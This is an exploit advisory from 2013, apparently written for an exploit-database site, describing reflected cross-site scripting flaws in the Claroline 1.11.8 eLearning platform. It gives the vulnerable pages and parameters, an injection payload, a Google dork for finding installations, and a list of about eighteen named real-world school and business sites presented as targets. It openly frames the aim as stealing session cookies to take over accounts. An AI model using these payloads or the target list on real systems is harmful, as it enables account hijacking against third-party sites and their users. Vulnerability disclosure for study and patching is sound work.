#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: Claroline 1.11.8 Cross Site Scripting # Date: 2013 11 October # Author: Arsan # Software Homepage: http://www.claroline.net # Version : 1.11.8 # Security Risk: High # Tested on: Windows 8 # Category: webapps # Google Dork: intext:"Powered by Claroline" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # [-] About Claroline : # # Claroline is an Open Source eLearning and eWorking platform allowing teachers to build # effective online courses and to manage learning and collaborative activities on the web. # Translated into 35 languages, Claroline has a large worldwide users and developers community. # # [-] Description : # # Malicious users can inject JavaScript, HTML. # and attacker can steal the session cookie and take over the account. # # 1) This vulnerability affects /claroline/index.php # # Discovered by: Scripting (XSS_in_URI.script). # /index.php?coursesearchbox_keyword=1 # # Attack details : # URI was set to "onmouseover='prompt(935555)'bad="> # The input is reflected inside a tag parameter between double quotes. # # 2) This vulnerability affects /claroline/claroline/auth/inscription.php # # Discovered by: Scripting (XSS.script). # # Attack details : # HTTP Header input Referer was set to 1_965430'():;900639 # The input is reflected inside Javascript code between single quotes. # # :) by Arsan # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # ------------------------- # http://demo.claroline.net # ------------------------- # http://claroline.fsm.ac.in/ # http://interlink.edu/claroline/uncg/ # http://claroline.city.academic.gr/ # http://claroline.hcdc.edu.ph/ # http://lms.skr.ac.th/claroline/ # http://its.mexicrea.com/ # http://eejsi.org/NL/claroline195/ # http://liceocecioni.org/elearn/claroline # http://drmasariraonline.com/claro/ # http://inatt.ru/e-learing/ # http://lfrancope.edu.pe/claronline # http://tutorshelp.co.nz/claro/ # http://designextremes.co.uk/claroline/ # http://lms2.icomunidadaprendizaje.net/ # http://henryfabian.com/ # http://continuingeducationprofessional.com/ # http://gotdiversity.com/ # http://synapse.iiml.ac.in/claroline/ # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#